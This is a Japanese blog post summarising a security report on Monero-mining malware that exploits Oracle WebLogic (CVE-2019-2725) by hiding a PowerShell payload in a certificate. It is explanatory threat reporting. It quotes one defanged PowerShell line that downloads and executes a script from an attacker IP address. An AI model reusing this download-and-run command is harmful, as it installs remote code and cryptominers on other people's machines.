現在も絶えない仮想通貨モネロ(XMR)「マイニングマルウェア」の脅威|独自考察

ブログランキングに参加中!!ポチッと押して応援よろしくお願い致します!!

にほんブログ村 投資ブログ 仮想通貨投資へ

現在も絶えない仮想通貨モネロ(XMR)「マイニングマルウェア」の脅威|独自考察
 

現在も絶えない仮想通貨モネロ(XMR)「マイニングマルウェア」の脅威|独自考察

マイニングマルウェアの脅威が絶えない
トレンドマイクロ社が、仮想通貨モネロをマイニングするマルウェアの脅威について報告書を公開した。当該脆弱性の分析、そして現在も存在している端末に侵入してマイニングを行うマルウェアについて確認する。

トレンドマイクロ社が報告書を公開

サイバーセキュリティを専門とする「トレンドマイクロ社」は6月10日、マイニングマルウェアの脅威について報告書を公開した。

公開された報告書は、【Oracle Weblogic】というソフトウェアの脆弱性(CVE-2019-2725)を利用して仮想通貨モネロをマイニングするマルウェアに関するものだ。当該脆弱性の分析、そして2019年に入ってからも続く、端末に侵入してマイニングを行うマルウェア(ここではマイニングマルウェアと呼称する)について見ていきたい。

このマルウェアに関する分析は、SANS ISC INFOSECフォーラムが情報源となっている。

そもそもOracle WebLogicは、JAVAが動くアプリケーションサーバーだ。もう少し詳しく説明すると、オラクル社が提供する業務用ミドルウェアや開発者向け製品などのソフトウェア製品群であり、エンジニアを除けば普通は扱うことはないだろう。

トレンドマイクロ社の報告から見えてくるもの

活発化するマイニングマルウェアによる攻撃

おわりに

以下の画像は、証明書を実際に見たことがある人向けだが、一見、普通の証明書に見える。

しかしこれをデコードすると、攻撃ペイロードのPowershellスクリプトが含まれていることが分かる。URLはhxxpとなっているが、特定のIPアドレスに通信を行っていることが分かるだろうか。この処理が行われてしまうと、update.ps1というスクリプトが実行され、勝手にモネロをマイニングされてしまうのだ。

iex(New-ObjectNet.WebClient).DownloadString(‘hxxp://139.180.199.167:1012/update[.]ps1’)

証明書を利用してマルウェアを配布するというアイデア自体は目新しいものではない。
昨年時点で概念実証は行われており、Excelをマクロを含めて実行させるなど、実行可能であることが示されていた。

一方で今回の事例を見ると、証明書に隠したスクリプト単体で動作するものではなく、特定IPへの通信は複雑な技術を用いずに通信される仕組みになっている。つまり、この通信をマルウェア対策ソフトウェアなどで検知される可能性があるということだ。この点は、まだまだ攻撃に改良の余地があることを示しており、報告書でもテストの可能性があると述べている。

引用元はこちら

当サイトは非営利にて運営を行わせて頂いております。
運営に関する募金はビットコインにて随時行わせて頂いております。
もし今後も当サイトを応援して頂ける方は是非ビットコインにて募金して頂けますと幸いです。

■ビットコイン(Bitcoin)
1L1mCDuAPZJJtt7boJvDzBNCqv66X3eqgQ

■イーサリアム(Ether)
0xB6c362e6c49F54F271E17CC1D064D5Ae6605066B